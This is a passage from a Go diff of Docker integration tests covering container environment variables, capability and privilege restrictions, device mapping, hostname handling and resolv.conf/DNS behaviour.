"id") + if err == nil { + c.Fatal("unknown user should cause container to fail") + } +} + +func (s *DockerSuite) TestRunTwoConcurrentContainers(c *check.C) { + sleepTime := "2" + group := sync.WaitGroup{} + group.Add(2) + + errChan := make(chan error, 2) + for i := 0; i < 2; i++ { + go func() { + defer group.Done() + _, _, err := dockerCmdWithError("run", "busybox", "sleep", sleepTime) + errChan <- err + }() + } + + group.Wait() + close(errChan) + + for err := range errChan { + c.Assert(err, check.IsNil) + } +} + +func (s *DockerSuite) TestRunEnvironment(c *check.C) { + // TODO Windows: Environment handling is different between Linux and + // Windows and this test relies currently on unix functionality. + testRequires(c, DaemonIsLinux) + cmd := exec.Command(dockerBinary, "run", "-h", "testing", "-e=FALSE=true", "-e=TRUE", "-e=TRICKY", "-e=HOME=", "busybox", "env") + cmd.Env = append(os.Environ(), + "TRUE=false", + "TRICKY=tri\ncky\n", + ) + + out, _, err := runCommandWithOutput(cmd) + if err != nil { + c.Fatal(err, out) + } + + actualEnv := strings.Split(strings.TrimSpace(out), "\n") + sort.Strings(actualEnv) + + goodEnv := []string{ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", + "HOSTNAME=testing", + "FALSE=true", + "TRUE=false", + "TRICKY=tri", + "cky", + "", + "HOME=/root", + } + sort.Strings(goodEnv) + if len(goodEnv) != len(actualEnv) { + c.Fatalf("Wrong environment: should be %d variables, not %d: %q", len(goodEnv), len(actualEnv), strings.Join(actualEnv, ", ")) + } + for i := range goodEnv { + if actualEnv[i] != goodEnv[i] { + c.Fatalf("Wrong environment variable: should be %s, not %s", goodEnv[i], actualEnv[i]) + } + } +} + +func (s *DockerSuite) TestRunEnvironmentErase(c *check.C) { + // TODO Windows: Environment handling is different between Linux and + // Windows and this test relies currently on unix functionality. + testRequires(c, DaemonIsLinux) + + // Test to make sure that when we use -e on env vars that are + // not set in our local env that they're removed (if present) in + // the container + + cmd := exec.Command(dockerBinary, "run", "-e", "FOO", "-e", "HOSTNAME", "busybox", "env") + cmd.Env = appendBaseEnv(true) + + out, _, err := runCommandWithOutput(cmd) + if err != nil { + c.Fatal(err, out) + } + + actualEnv := strings.Split(strings.TrimSpace(out), "\n") + sort.Strings(actualEnv) + + goodEnv := []string{ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", + "HOME=/root", + } + sort.Strings(goodEnv) + if len(goodEnv) != len(actualEnv) { + c.Fatalf("Wrong environment: should be %d variables, not %d: %q", len(goodEnv), len(actualEnv), strings.Join(actualEnv, ", ")) + } + for i := range goodEnv { + if actualEnv[i] != goodEnv[i] { + c.Fatalf("Wrong environment variable: should be %s, not %s", goodEnv[i], actualEnv[i]) + } + } +} + +func (s *DockerSuite) TestRunEnvironmentOverride(c *check.C) { + // TODO Windows: Environment handling is different between Linux and + // Windows and this test relies currently on unix functionality. + testRequires(c, DaemonIsLinux) + + // Test to make sure that when we use -e on env vars that are + // already in the env that we're overriding them + + cmd := exec.Command(dockerBinary, "run", "-e", "HOSTNAME", "-e", "HOME=/root2", "busybox", "env") + cmd.Env = appendBaseEnv(true, "HOSTNAME=bar") + + out, _, err := runCommandWithOutput(cmd) + if err != nil { + c.Fatal(err, out) + } + + actualEnv := strings.Split(strings.TrimSpace(out), "\n") + sort.Strings(actualEnv) + + goodEnv := []string{ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", + "HOME=/root2", + "HOSTNAME=bar", + } + sort.Strings(goodEnv) + if len(goodEnv) != len(actualEnv) { + c.Fatalf("Wrong environment: should be %d variables, not %d: %q", len(goodEnv), len(actualEnv), strings.Join(actualEnv, ", ")) + } + for i := range goodEnv { + if actualEnv[i] != goodEnv[i] { + c.Fatalf("Wrong environment variable: should be %s, not %s", goodEnv[i], actualEnv[i]) + } + } +} + +func (s *DockerSuite) TestRunContainerNetwork(c *check.C) { + if daemonPlatform == "windows" { + // Windows busybox does not have ping. Use built in ping instead. + dockerCmd(c, "run", WindowsBaseImage, "ping", "-n", "1", "127.0.0.1") + } else { + dockerCmd(c, "run", "busybox", "ping", "-c", "1", "127.0.0.1") + } +} + +func (s *DockerSuite) TestRunNetHostNotAllowedWithLinks(c *check.C) { + // TODO Windows: This is Linux specific as --link is not supported and + // this will be deprecated in favor of container networking model. + testRequires(c, DaemonIsLinux, NotUserNamespace) + dockerCmd(c, "run", "--name", "linked", "busybox", "true") + + _, _, err := dockerCmdWithError("run", "--net=host", "--link", "linked:linked", "busybox", "true") + if err == nil { + c.Fatal("Expected error") + } +} + +// #7851 hostname outside container shows FQDN, inside only shortname +// For testing purposes it is not required to set host's hostname directly +// and use "--net=host" (as the original issue submitter did), as the same +// codepath is executed with "docker run -h ". Both were manually +// tested, but this testcase takes the simpler path of using "run -h .." +func (s *DockerSuite) TestRunFullHostnameSet(c *check.C) { + // TODO Windows: -h is not yet functional. + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-h", "foo.bar.baz", "busybox", "hostname") + if actual := strings.Trim(out, "\r\n"); actual != "foo.bar.baz" { + c.Fatalf("expected hostname 'foo.bar.baz', received %s", actual) + } +} + +func (s *DockerSuite) TestRunPrivilegedCanMknod(c *check.C) { + // Not applicable for Windows as Windows daemon does not support + // the concept of --privileged, and mknod is a Unix concept. + testRequires(c, DaemonIsLinux, NotUserNamespace) + out, _ := dockerCmd(c, "run", "--privileged", "busybox", "sh", "-c", "mknod /tmp/sda b 8 0 && echo ok") + if actual := strings.Trim(out, "\r\n"); actual != "ok" { + c.Fatalf("expected output ok received %s", actual) + } +} + +func (s *DockerSuite) TestRunUnprivilegedCanMknod(c *check.C) { + // Not applicable for Windows as Windows daemon does not support + // the concept of --privileged, and mknod is a Unix concept. + testRequires(c, DaemonIsLinux, NotUserNamespace) + out, _ := dockerCmd(c, "run", "busybox", "sh", "-c", "mknod /tmp/sda b 8 0 && echo ok") + if actual := strings.Trim(out, "\r\n"); actual != "ok" { + c.Fatalf("expected output ok received %s", actual) + } +} + +func (s *DockerSuite) TestRunCapDropInvalid(c *check.C) { + // Not applicable for Windows as there is no concept of --cap-drop + testRequires(c, DaemonIsLinux) + out, _, err := dockerCmdWithError("run", "--cap-drop=CHPASS", "busybox", "ls") + if err == nil { + c.Fatal(err, out) + } +} + +func (s *DockerSuite) TestRunCapDropCannotMknod(c *check.C) { + // Not applicable for Windows as there is no concept of --cap-drop or mknod + testRequires(c, DaemonIsLinux) + out, _, err := dockerCmdWithError("run", "--cap-drop=MKNOD", "busybox", "sh", "-c", "mknod /tmp/sda b 8 0 && echo ok") + + if err == nil { + c.Fatal(err, out) + } + if actual := strings.Trim(out, "\r\n"); actual == "ok" { + c.Fatalf("expected output not ok received %s", actual) + } +} + +func (s *DockerSuite) TestRunCapDropCannotMknodLowerCase(c *check.C) { + // Not applicable for Windows as there is no concept of --cap-drop or mknod + testRequires(c, DaemonIsLinux) + out, _, err := dockerCmdWithError("run", "--cap-drop=mknod", "busybox", "sh", "-c", "mknod /tmp/sda b 8 0 && echo ok") + + if err == nil { + c.Fatal(err, out) + } + if actual := strings.Trim(out, "\r\n"); actual == "ok" { + c.Fatalf("expected output not ok received %s", actual) + } +} + +func (s *DockerSuite) TestRunCapDropALLCannotMknod(c *check.C) { + // Not applicable for Windows as there is no concept of --cap-drop or mknod + testRequires(c, DaemonIsLinux) + out, _, err := dockerCmdWithError("run", "--cap-drop=ALL", "--cap-add=SETGID", "busybox", "sh", "-c", "mknod /tmp/sda b 8 0 && echo ok") + if err == nil { + c.Fatal(err, out) + } + if actual := strings.Trim(out, "\r\n"); actual == "ok" { + c.Fatalf("expected output not ok received %s", actual) + } +} + +func (s *DockerSuite) TestRunCapDropALLAddMknodCanMknod(c *check.C) { + // Not applicable for Windows as there is no concept of --cap-drop or mknod + testRequires(c, DaemonIsLinux, NotUserNamespace) + out, _ := dockerCmd(c, "run", "--cap-drop=ALL", "--cap-add=MKNOD", "--cap-add=SETGID", "busybox", "sh", "-c", "mknod /tmp/sda b 8 0 && echo ok") + + if actual := strings.Trim(out, "\r\n"); actual != "ok" { + c.Fatalf("expected output ok received %s", actual) + } +} + +func (s *DockerSuite) TestRunCapAddInvalid(c *check.C) { + // Not applicable for Windows as there is no concept of --cap-add + testRequires(c, DaemonIsLinux) + out, _, err := dockerCmdWithError("run", "--cap-add=CHPASS", "busybox", "ls") + if err == nil { + c.Fatal(err, out) + } +} + +func (s *DockerSuite) TestRunCapAddCanDownInterface(c *check.C) { + // Not applicable for Windows as there is no concept of --cap-add + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "--cap-add=NET_ADMIN", "busybox", "sh", "-c", "ip link set eth0 down && echo ok") + + if actual := strings.Trim(out, "\r\n"); actual != "ok" { + c.Fatalf("expected output ok received %s", actual) + } +} + +func (s *DockerSuite) TestRunCapAddALLCanDownInterface(c *check.C) { + // Not applicable for Windows as there is no concept of --cap-add + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "--cap-add=ALL", "busybox", "sh", "-c", "ip link set eth0 down && echo ok") + + if actual := strings.Trim(out, "\r\n"); actual != "ok" { + c.Fatalf("expected output ok received %s", actual) + } +} + +func (s *DockerSuite) TestRunCapAddALLDropNetAdminCanDownInterface(c *check.C) { + // Not applicable for Windows as there is no concept of --cap-add + testRequires(c, DaemonIsLinux) + out, _, err := dockerCmdWithError("run", "--cap-add=ALL", "--cap-drop=NET_ADMIN", "busybox", "sh", "-c", "ip link set eth0 down && echo ok") + if err == nil { + c.Fatal(err, out) + } + if actual := strings.Trim(out, "\r\n"); actual == "ok" { + c.Fatalf("expected output not ok received %s", actual) + } +} + +func (s *DockerSuite) TestRunGroupAdd(c *check.C) { + // Not applicable for Windows as there is no concept of --group-add + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "--group-add=audio", "--group-add=staff", "--group-add=777", "busybox", "sh", "-c", "id") + + groupsList := "uid=0(root) gid=0(root) groups=10(wheel),29(audio),50(staff),777" + if actual := strings.Trim(out, "\r\n"); actual != groupsList { + c.Fatalf("expected output %s received %s", groupsList, actual) + } +} + +func (s *DockerSuite) TestRunPrivilegedCanMount(c *check.C) { + // Not applicable for Windows as there is no concept of --privileged + testRequires(c, DaemonIsLinux, NotUserNamespace) + out, _ := dockerCmd(c, "run", "--privileged", "busybox", "sh", "-c", "mount -t tmpfs none /tmp && echo ok") + + if actual := strings.Trim(out, "\r\n"); actual != "ok" { + c.Fatalf("expected output ok received %s", actual) + } +} + +func (s *DockerSuite) TestRunUnprivilegedCannotMount(c *check.C) { + // Not applicable for Windows as there is no concept of unprivileged + testRequires(c, DaemonIsLinux) + out, _, err := dockerCmdWithError("run", "busybox", "sh", "-c", "mount -t tmpfs none /tmp && echo ok") + + if err == nil { + c.Fatal(err, out) + } + if actual := strings.Trim(out, "\r\n"); actual == "ok" { + c.Fatalf("expected output not ok received %s", actual) + } +} + +func (s *DockerSuite) TestRunSysNotWritableInNonPrivilegedContainers(c *check.C) { + // Not applicable for Windows as there is no concept of unprivileged + testRequires(c, DaemonIsLinux, NotArm) + if _, code, err := dockerCmdWithError("run", "busybox", "touch", "/sys/kernel/profiling"); err == nil || code == 0 { + c.Fatal("sys should not be writable in a non privileged container") + } +} + +func (s *DockerSuite) TestRunSysWritableInPrivilegedContainers(c *check.C) { + // Not applicable for Windows as there is no concept of unprivileged + testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm) + if _, code, err := dockerCmdWithError("run", "--privileged", "busybox", "touch", "/sys/kernel/profiling"); err != nil || code != 0 { + c.Fatalf("sys should be writable in privileged container") + } +} + +func (s *DockerSuite) TestRunProcNotWritableInNonPrivilegedContainers(c *check.C) { + // Not applicable for Windows as there is no concept of unprivileged + testRequires(c, DaemonIsLinux) + if _, code, err := dockerCmdWithError("run", "busybox", "touch", "/proc/sysrq-trigger"); err == nil || code == 0 { + c.Fatal("proc should not be writable in a non privileged container") + } +} + +func (s *DockerSuite) TestRunProcWritableInPrivilegedContainers(c *check.C) { + // Not applicable for Windows as there is no concept of --privileged + testRequires(c, DaemonIsLinux, NotUserNamespace) + if _, code := dockerCmd(c, "run", "--privileged", "busybox", "sh", "-c", "touch /proc/sysrq-trigger"); code != 0 { + c.Fatalf("proc should be writable in privileged container") + } +} + +func (s *DockerSuite) TestRunDeviceNumbers(c *check.C) { + // Not applicable on Windows as /dev/ is a Unix specific concept + // TODO: NotUserNamespace could be removed here if "root" "root" is replaced w user + testRequires(c, DaemonIsLinux, NotUserNamespace) + out, _ := dockerCmd(c, "run", "busybox", "sh", "-c", "ls -l /dev/null") + deviceLineFields := strings.Fields(out) + deviceLineFields[6] = "" + deviceLineFields[7] = "" + deviceLineFields[8] = "" + expected := []string{"crw-rw-rw-", "1", "root", "root", "1,", "3", "", "", "", "/dev/null"} + + if !(reflect.DeepEqual(deviceLineFields, expected)) { + c.Fatalf("expected output\ncrw-rw-rw- 1 root root 1, 3 May 24 13:29 /dev/null\n received\n %s\n", out) + } +} + +func (s *DockerSuite) TestRunThatCharacterDevicesActLikeCharacterDevices(c *check.C) { + // Not applicable on Windows as /dev/ is a Unix specific concept + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "busybox", "sh", "-c", "dd if=/dev/zero of=/zero bs=1k count=5 2> /dev/null ; du -h /zero") + if actual := strings.Trim(out, "\r\n"); actual[0] == '0' { + c.Fatalf("expected a new file called /zero to be create that is greater than 0 bytes long, but du says: %s", actual) + } +} + +func (s *DockerSuite) TestRunUnprivilegedWithChroot(c *check.C) { + // Not applicable on Windows as it does not support chroot + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "busybox", "chroot", "/", "true") +} + +func (s *DockerSuite) TestRunAddingOptionalDevices(c *check.C) { + // Not applicable on Windows as Windows does not support --device + testRequires(c, DaemonIsLinux, NotUserNamespace) + out, _ := dockerCmd(c, "run", "--device", "/dev/zero:/dev/nulo", "busybox", "sh", "-c", "ls /dev/nulo") + if actual := strings.Trim(out, "\r\n"); actual != "/dev/nulo" { + c.Fatalf("expected output /dev/nulo, received %s", actual) + } +} + +func (s *DockerSuite) TestRunAddingOptionalDevicesNoSrc(c *check.C) { + // Not applicable on Windows as Windows does not support --device + testRequires(c, DaemonIsLinux, NotUserNamespace) + out, _ := dockerCmd(c, "run", "--device", "/dev/zero:rw", "busybox", "sh", "-c", "ls /dev/zero") + if actual := strings.Trim(out, "\r\n"); actual != "/dev/zero" { + c.Fatalf("expected output /dev/zero, received %s", actual) + } +} + +func (s *DockerSuite) TestRunAddingOptionalDevicesInvalidMode(c *check.C) { + // Not applicable on Windows as Windows does not support --device + testRequires(c, DaemonIsLinux, NotUserNamespace) + _, _, err := dockerCmdWithError("run", "--device", "/dev/zero:ro", "busybox", "sh", "-c", "ls /dev/zero") + if err == nil { + c.Fatalf("run container with device mode ro should fail") + } +} + +func (s *DockerSuite) TestRunModeHostname(c *check.C) { + // Not applicable on Windows as Windows does not support -h + testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace) + + out, _ := dockerCmd(c, "run", "-h=testhostname", "busybox", "cat", "/etc/hostname") + + if actual := strings.Trim(out, "\r\n"); actual != "testhostname" { + c.Fatalf("expected 'testhostname', but says: %q", actual) + } + + out, _ = dockerCmd(c, "run", "--net=host", "busybox", "cat", "/etc/hostname") + + hostname, err := os.Hostname() + if err != nil { + c.Fatal(err) + } + if actual := strings.Trim(out, "\r\n"); actual != hostname { + c.Fatalf("expected %q, but says: %q", hostname, actual) + } +} + +func (s *DockerSuite) TestRunRootWorkdir(c *check.C) { + out, _ := dockerCmd(c, "run", "--workdir", "/", "busybox", "pwd") + expected := "/\n" + if daemonPlatform == "windows" { + expected = "C:" + expected + } + if out != expected { + c.Fatalf("pwd returned %q (expected %s)", s, expected) + } +} + +func (s *DockerSuite) TestRunAllowBindMountingRoot(c *check.C) { + if daemonPlatform == "windows" { + // Windows busybox will fail with Permission Denied on items such as pagefile.sys + dockerCmd(c, "run", "-v", `c:\:c:\host`, WindowsBaseImage, "cmd", "-c", "dir", `c:\host`) + } else { + dockerCmd(c, "run", "-v", "/:/host", "busybox", "ls", "/host") + } +} + +func (s *DockerSuite) TestRunDisallowBindMountingRootToRoot(c *check.C) { + mount := "/:/" + targetDir := "/host" + if daemonPlatform == "windows" { + mount = `c:\:c\` + targetDir = "c:/host" // Forward slash as using busybox + } + out, _, err := dockerCmdWithError("run", "-v", mount, "busybox", "ls", targetDir) + if err == nil { + c.Fatal(out, err) + } +} + +// Verify that a container gets default DNS when only localhost resolvers exist +func (s *DockerSuite) TestRunDNSDefaultOptions(c *check.C) { + // Not applicable on Windows as this is testing Unix specific functionality + testRequires(c, SameHostDaemon, DaemonIsLinux) + + // preserve original resolv.conf for restoring after test + origResolvConf, err := ioutil.ReadFile("/etc/resolv.conf") + if os.IsNotExist(err) { + c.Fatalf("/etc/resolv.conf does not exist") + } + // defer restored original conf + defer func() { + if err := ioutil.WriteFile("/etc/resolv.conf", origResolvConf, 0644); err != nil { + c.Fatal(err) + } + }() + + // test 3 cases: standard IPv4 localhost, commented out localhost, and IPv6 localhost + // 2 are removed from the file at container start, and the 3rd (commented out) one is ignored by + // GetNameservers(), leading to a replacement of nameservers with the default set + tmpResolvConf := []byte("nameserver 127.0.0.1\n#nameserver 127.0.2.1\nnameserver ::1") + if err := ioutil.WriteFile("/etc/resolv.conf", tmpResolvConf, 0644); err != nil { + c.Fatal(err) + } + + actual, _ := dockerCmd(c, "run", "busybox", "cat", "/etc/resolv.conf") + // check that the actual defaults are appended to the commented out + // localhost resolver (which should be preserved) + // NOTE: if we ever change the defaults from google dns, this will break + expected := "#nameserver 127.0.2.1\n\nnameserver 8.8.8.8\nnameserver 8.8.4.4\n" + if actual != expected { + c.Fatalf("expected resolv.conf be: %q, but was: %q", expected, actual) + } +} + +func (s *DockerSuite) TestRunDNSOptions(c *check.C) { + // Not applicable on Windows as Windows does not support --dns*, or + // the Unix-specific functionality of resolv.conf. + testRequires(c, DaemonIsLinux) + out, stderr, _ := dockerCmdWithStdoutStderr(c, "run", "--dns=127.0.0.1", "--dns-search=mydomain", "--dns-opt=ndots:9", "busybox", "cat", "/etc/resolv.conf") + + // The client will get a warning on stderr when setting DNS to a localhost address; verify this: + if !strings.Contains(stderr, "Localhost DNS setting") { + c.Fatalf("Expected warning on stderr about localhost resolver, but got %q", stderr) + } + + actual := strings.Replace(strings.Trim(out, "\r\n"), "\n", " ", -1) + if actual != "search mydomain nameserver 127.0.0.1 options ndots:9" { + c.Fatalf("expected 'search mydomain nameserver 127.0.0.1 options ndots:9', but says: %q", actual) + } + + out, stderr, _ = dockerCmdWithStdoutStderr(c, "run", "--dns=127.0.0.1", "--dns-search=.", "--dns-opt=ndots:3", "busybox", "cat", "/etc/resolv.conf") + + actual = strings.Replace(strings.Trim(strings.Trim(out, "\r\n"), " "), "\n", " ", -1) + if actual != "nameserver 127.0.0.1 options ndots:3" { + c.Fatalf("expected 'nameserver 127.0.0.1 options ndots:3', but says: %q", actual) + } +} + +func (s *DockerSuite) TestRunDNSRepeatOptions(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _, _ := dockerCmdWithStdoutStderr(c, "run", "--dns=1.1.1.1", "--dns=2.2.2.2", "--dns-search=mydomain", "--dns-search=mydomain2", "--dns-opt=ndots:9", "--dns-opt=timeout:3", "busybox", "cat", "/etc/resolv.conf") + + actual := strings.Replace(strings.Trim(out, "\r\n"), "\n", " ", -1) + if actual != "search mydomain mydomain2 nameserver 1.1.1.1 nameserver 2.2.2.2 options ndots:9 timeout:3" { + c.Fatalf("expected 'search mydomain mydomain2 nameserver 1.1.1.1 nameserver 2.2.2.2 options ndots:9 timeout:3', but says: %q", actual) + } +} + +func (s *DockerSuite) TestRunDNSOptionsBasedOnHostResolvConf(c *check.C) { + // Not applicable on Windows as testing Unix specific functionality + testRequires(c, SameHostDaemon, DaemonIsLinux) + + origResolvConf, err := ioutil.ReadFile("/etc/resolv.conf") + if os.IsNotExist(err) { + c.Fatalf("/etc/resolv.conf does not exist") + } + + hostNameservers := resolvconf.GetNameservers(origResolvConf, types.IP) + hostSearch := resolvconf.GetSearchDomains(origResolvConf) + + var out string + out, _ = dockerCmd(c, "run", "--dns=127.0.0.1", "busybox", "cat", "/etc/resolv.conf") + + if actualNameservers := resolvconf.GetNameservers([]byte(out), types.IP); string(actualNameservers[0]) != "127.0.0.1" { + c.Fatalf("expected '127.0.0.1', but says: %q", string(actualNameservers[0])) + } + + actualSearch := resolvconf.GetSearchDomains([]byte(out)) + if len(actualSearch) != len(hostSearch) { + c.Fatalf("expected %q search domain(s), but it has: %q", len(hostSearch), len(actualSearch)) + } + for i := range actualSearch { + if actualSearch[i] != hostSearch[i] { + c.Fatalf("expected %q domain, but says: %q", actualSearch[i], hostSearch[i]) + } + } + + out, _ = dockerCmd(c, "run", "--dns-search=mydomain", "busybox", "cat", "/etc/resolv.conf") + + actualNameservers := resolvconf.GetNameservers([]byte(out), types.IP) + if len(actualNameservers) != len(hostNameservers) { + c.Fatalf("expected %q nameserver(s), but it has: %q", len(hostNameservers), len(actualNameservers)) + } + for i := range actualNameservers { + if actualNameservers[i] != hostNameservers[i] { + c.Fatalf("expected %q nameserver, but says: %q", actualNameservers[i], hostNameservers[i]) + } + } + + if actualSearch = resolvconf.GetSearchDomains([]byte(out)); string(actualSearch[0]) != "mydomain" { + c.Fatalf("expected 'mydomain', but says: %q", string(actualSearch[0])) + } + + // test with file + tmpResolvConf := []byte("search example.com\nnameserver 12.34.56.78\nnameserver 127.0.0.1") + if err := ioutil.WriteFile("/etc/resolv.conf", tmpResolvConf, 0644); err != nil { + c.Fatal(err) + } + // put the old resolvconf back + defer func() { + if err := ioutil.WriteFile("/etc/resolv.conf", origResolvConf, 0644); err != nil { + c.Fatal(err) + } + }() + + resolvConf, err := ioutil.ReadFile("/etc/resolv.conf") + if os.IsNotExist(err) { + c.Fatalf("/etc/resolv.conf does not exist") + } + + hostNameservers = resolvconf.GetNameservers(resolvConf, types.IP) + hostSearch = resolvconf.GetSearchDomains(resolvConf) + + out, _ = dockerCmd(c, "run", "busybox", "cat", "/etc/resolv.conf") + if actualNameservers = resolvconf.GetNameservers([]byte(out), types.IP); string(actualNameservers[0]) != "12.34.56.78" || len(actualNameservers) != 1 { + c.Fatalf("expected '12.34.56.78', but has: %v", actualNameservers) + } + + actualSearch = resolvconf.GetSearchDomains([]byte(out)) + if len(actualSearch) != len(hostSearch) { + c.Fatalf("expected %q search domain(s), but it has: %q", len(hostSearch), len(actualSearch)) + } + for i := range actualSearch { + if actualSearch[i] != hostSearch[i] { + c.Fatalf("expected %q domain, but says: %q", actualSearch[i], hostSearch[i]) + } + } +} + +// Test to see if a non-root user can resolve a DNS name. Also +// check if the container resolv.conf file has at least 0644 perm. +func (s *DockerSuite) TestRunNonRootUserResolvName(c *check.C) { + // Not applicable on Windows as Windows does not support --user + testRequires(c, SameHostDaemon, Network, DaemonIsLinux, NotArm) + + dockerCmd(c, "run", "--name=testperm", "--user=nobody", "busybox", "nslookup", "apt.dockerproject.org") + + cID, err := getIDByName("testperm") + if err != nil { + c.Fatal(err) + } + + fmode := (os.FileMode)(0644) + finfo, err := os.Stat(containerStorageFile(cID, "resolv.conf")) + if err != nil { + c.Fatal(err) + } + + if (finfo.Mode() & fmode) != fmode { + c.Fatalf("Expected container resolv.conf mode to be at least %s, instead got %s", fmode.String(), finfo.Mode().String()) + } +} + +// Test if container resolv.conf gets updated the next time it restarts +// if host /etc/resolv.conf has changed. This only applies if the container +// uses the host's /etc/resolv.conf and does not have any dns options provided. +func (s *DockerSuite) TestRunResolvconfUpdate(c *check.C) { + // Not applicable on Windows as testing unix specific functionality + testRequires(c, SameHostDaemon, DaemonIsLinux) + c.Skip("Unstable test, to be re-activated once #19937 is resolved") + + tmpResolvConf := []byte("search pommesfrites.fr\nnameserver 12.34.56.78\n") + tmpLocalhostResolvConf := []byte("nameserver 127.0.0.1") + + //take a copy of resolv.conf for restoring after test completes + resolvConfSystem, err := ioutil.ReadFile("/etc/resolv.conf") + if err != nil { + c.Fatal(err) + } + + // This test case is meant to test monitoring resolv.conf when it is + // a regular file not a bind mounc. So we unmount resolv.conf and replace + // it with a file containing the original settings. + mounted, err := mount.Mounted("/etc/resolv.conf") + if err != nil { + c.Fatal(err) + } + if mounted { + cmd := exec.Command("umount", "/etc/resolv.conf") + if _, err = runCommand(cmd); err != nil { + c.Fatal(err) + } + } + + //cleanup + defer func() { + if err := ioutil.WriteFile("/etc/resolv.conf", resolvConfSystem, 0644); err != nil { + c.Fatal(err) + } + }() + + //1. test that a restarting container gets an updated resolv.conf + dockerCmd(c, "run", "--name=first", "busybox", "true") + containerID1, err := getIDByName("first") + if err != nil { + c.Fatal(err) + } + + // replace resolv.conf with our temporary copy + bytesResolvConf := []byte(tmpResolvConf) + if err := ioutil.WriteFile("/etc/resolv.conf", bytesResolvConf, 0644); err != nil { + c.Fatal(err) + } + + // start the container again to pickup changes + dockerCmd(c, "start", "first") + + // check for update in container + containerResolv, err := readContainerFile(containerID1, "resolv.conf") + if err != nil { + c.Fatal(err) + } + if !bytes.Equal(containerResolv, bytesResolvConf) { + c.Fatalf("Restarted container does not have updated resolv.conf; expected %q, got %q", tmpResolvConf, string(containerResolv)) + } + + /* //make a change to resolv.conf (in this case replacing our tmp copy with orig copy) + if err := ioutil.WriteFile("/etc/resolv.conf", resolvConfSystem, 0644); err != nil { + c.Fatal(err) + } */ + //2. test that a restarting container does not receive resolv.conf updates + // if it modified the container copy of the starting point resolv.conf + dockerCmd(c, "run", "--name=second", "busybox", "sh", "-c", "echo 'search mylittlepony.com' >>/etc/resolv.conf") + containerID2, err := getIDByName("second") + if err != nil { + c.Fatal(err) + } + + //make a change to resolv.conf (in this case replacing our tmp copy with orig copy) + if err := ioutil.WriteFile("/etc/resolv.conf", resolvConfSystem, 0644); err != nil { + c.Fatal(err) + } + + // start the container again + dockerCmd(c, "start", "second") + + // check for update in container + containerResolv, err = readContainerFile(containerID2, "resolv.conf") + if err != nil { + c.Fatal(err) + } + + if bytes.Equal(containerResolv, resolvConfSystem) { + c.Fatalf("Container's resolv.conf should not have been updated with host resolv.conf: %q", string(containerResolv)) + } + + //3. test that a running container's resolv.conf is not modified while running + out, _ := dockerCmd(c, "run", "-d", "busybox", "top") + runningContainerID := strings.TrimSpace(out) + + // replace resolv.conf + if err := ioutil.WriteFile("/etc/resolv.conf", bytesResolvConf, 0644); err != nil { + c.Fatal(err) + } + + // check for update in container + containerResolv, err = readContainerFile(runningContainerID, "resolv.conf") + if err != nil { + c.Fatal(err) + } + + if bytes.Equal(containerResolv, bytesResolvConf) { + c.Fatalf("Running container should not have updated resolv.conf; expected %q, got %q", string(resolvConfSystem), string(containerResolv)) + } + + //4. test that a running container's resolv.conf is updated upon restart + // (the above container is still running..) + dockerCmd(c, "restart", runningContainerID) + + // check for update in container + containerResolv, err = readContainerFile(runningContainerID, "resolv.conf") + if err != nil { + c.Fatal(err) + } + if !bytes.Equal(containerResolv, bytesResolvConf) { + c.Fatalf("Restarted container should have updated resolv.conf; expected %q, got %q", string(bytesResolvConf), string(containerResolv)) + } + + //5. test that additions of a localhost resolver are cleaned from + // host resolv.conf before updating container's resolv.conf copies + + // replace resolv.conf with a localhost-only nameserver copy + bytesResolvConf = []byte(tmpLocalhostResolvConf) + if err = ioutil.WriteFile("/etc/resolv.conf", bytesResolvConf, 0644); err != nil { + c.Fatal(err) + } + + // start the container again to pickup changes + dockerCmd(c, "start", "first") + + // our first exited container ID should have been updated, but with default DNS + // after the cleanup of resolv.conf found only a localhost nameserver: + containerResolv, err = readContainerFile(containerID1, "resolv.conf") + if err != nil { + c.Fatal(err) + } + + expected := "\nnameserver 8.8.8.8\nnameserver 8.8.4.4\n" + if !bytes.Equal(containerResolv, []byte(expected)) { + c.Fatalf("Container does not have cleaned/replaced DNS in resolv.conf; expected %q, got %q", expected, string(containerResolv)) + } + + //6. Test that replacing (as opposed to modifying) resolv.conf triggers an update + // of containers' resolv.conf. + + // Restore the original resolv.conf + if err := ioutil.WriteFile("/etc/resolv.conf", resolvConfSystem, 0644); err != nil { + c.Fatal(err) + } + + // Run the container so it picks up the old settings + dockerCmd(c, "run", "--name=third", "busybox", "true") + containerID3, err := getIDByName("third") + if err != nil { + c.Fatal(err) + } + + // Create a modified resolv.conf.aside and override resolv.conf with it + bytesResolvConf = []byte(tmpResolvConf) + if err := ioutil.WriteFile("/etc/resolv.conf.aside", bytesResolvConf, 0644); err != nil { + c.Fatal(err) + } + + err = os.Rename("/etc/resolv.conf.aside", "/etc/resolv.conf") + if err != nil { + c.Fatal(err) + } + + // start the container again to pickup changes + dockerCmd(c, "start", "third") + + // check for update in container + containerResolv, err = readContainerFile(containerID3, "resolv.conf") + if err != nil { + c.Fatal(err) + } + if !bytes.Equal(containerResolv, bytesResolvConf) { + c.Fatalf("Stopped container does not have updated resolv.conf; expected\n%q\n got\n%q", tmpResolvConf, string(containerResolv)) + } + + //cleanup, restore original resolv.conf happens in defer func() +} + +func (s *DockerSuite) TestRunAddHost(c *check.C) { + // Not applicable on Windows as it does not support --add-host + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "--add-host=extra:86.75.30.9", "busybox", "grep", "extra", "/etc/hosts") + + actual := strings.Trim(out, "\r\n") + if actual != "86.75.30.9\textra" { + c.Fatalf("expected '86.75.30.9\textra', but says: %q", actual) + } +} + +// Regression test for #6983 +func (s *DockerSuite) TestRunAttachStdErrOnlyTTYMode(c *check.C) { + _, exitCode := dockerCmd(c, "run", "-t", "-a", "stderr", "busybox", "true") + if exitCode != 0 { 